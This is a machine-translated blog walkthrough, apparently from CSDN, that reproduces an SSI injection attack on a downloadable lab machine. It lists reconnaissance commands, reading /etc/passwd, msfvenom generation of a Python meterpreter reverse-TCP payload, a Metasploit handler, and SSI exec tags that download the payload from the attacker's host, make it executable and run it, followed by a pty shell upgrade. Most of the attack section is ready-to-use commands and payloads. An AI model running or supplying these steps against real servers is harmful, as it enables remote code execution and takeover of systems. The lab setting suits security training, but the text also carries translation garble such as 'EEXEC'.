Inyección de vulnerabilidad SSI

Principio de inyección de vulnerabilidad SSI

SSI (inclusión del lado del servidor), generalmente llamado incrustación del lado del servidor, es una tecnología de producción de páginas web basada en el servidor similar a ASP. SSI tiene funciones poderosas. Siempre que use un comando SSI simple, puede actualizar el contenido de todo el sitio web, mostrar dinámicamente la hora y la fecha y ejecutar funciones complejas como programas de script de shell y CGI.

En muchos escenarios, el contenido ingresado por el usuario se puede mostrar en la página, como una página con una vulnerabilidad de reflejo XSS. Si la carga útil de entrada no es el código xss sino la etiqueta ssi, y el servidor abre el soporte ssi, allí será una vulnerabilidad SSI.

Listo para trabajar

Dirección de
destino : enlace: https://pan.baidu.com/s/1MTunDny-m5eICXAS9P8ugA
código de extracción: x3c2

Proceso de reproducción de la vulnerabilidad

  1. Utilice netdiscover para descubrir hosts supervivientes
netdiscover -i eth0

Inserte la descripción de la imagen aquí

  1. Utilice nmap para la detección de servicios
nmap -sV 172.20.10.8
  • Descubrió que el servidor ha habilitado el servicio apache
    Inserte la descripción de la imagen aquí
  1. Luego use nikto y dirb para realizar la minería de información del subdirectorio en el servidor de destino
nikto -host http://172.20.10.8
dirb http://172.20.10.8
  • Encontrado el archivo index.shtml, se puede juzgar preliminarmente que hay inyección ssi
    Inserte la descripción de la imagen aquí

  • Se encontró el directorio específico de ssi al usar la detección de dirb y el acceso de inicio de sesión a cada directorio
    Inserte la descripción de la imagen aquí

  • No se encontró información valiosa en el archivo robots.txt.
    Inserte la descripción de la imagen aquí

  • Encontré un sitio web de inicio de sesión y algo de información de comandos en el directorio de índices y en la página index.php
    Inserte la descripción de la imagen aquí

  • Visite la página de índice
    Inserte la descripción de la imagen aquí

  1. Intente utilizar el comando anterior para iniciar sesión en el backend del sitio web para obtener información confidencial
    Inserte la descripción de la imagen aquí
  • Al omitir el filtrado de caracteres, descubrí que se puede obtener la información en el archivo / etc / passwd
    Inserte la descripción de la imagen aquí
  1. Intente usar msfvenom para generar shellcode para inyectar vulnerabilidades en el sitio web
msfvenom -p python/meterpreter/reverse_tcp lhost=本机IP lport=4444 -f raw > /root/Desktop/shellcode.py

Inserte la descripción de la imagen aquí

  • Nota: Debido a que la carga de archivos es necesaria para la inyección, el servicio apache debe estar activado para inyectar y cargar correctamente el archivo shellcode.py en el directorio de archivos html.
service apache2 start
service apache2 status
mv /root/Desktop/shellcode.py /var/www/html
  1. Abrir marco msfconsole, explotar y monitorear
msfconsole
use exploit/multi/handler
set lhost 本机IP
set payload python/meterpreter/reverse_tcp
run

Inserte la descripción de la imagen aquí

  1. Utilice el formulario de publicación para descargar el shellcode en http: // target machine ip / index.php
  • Ingrese cualquier valor en el primer cuadro de entrada
  • Ejecute comandos maliciosos en el segundo cuadro de entrada
<!--#EEXEC cmd="wget http://本机IP/shellcode.py">
<!--#EEXEC cmd="chmod 777 shellcode.py">
<!--#EEXEC cmd="python shellcode.py">

Inserte la descripción de la imagen aquí

  • Rebound webshell tuvo éxito
    Inserte la descripción de la imagen aquí
  • Ingrese el siguiente código para la optimización del terminal
shell
python -c "import pty; pty.spawn('/bin/bash')"
id;pwd

Inserte la descripción de la imagen aquí

Supongo que te gusta

Origin blog.csdn.net/weixin_45007073/article/details/112179198
Recomendado
Clasificación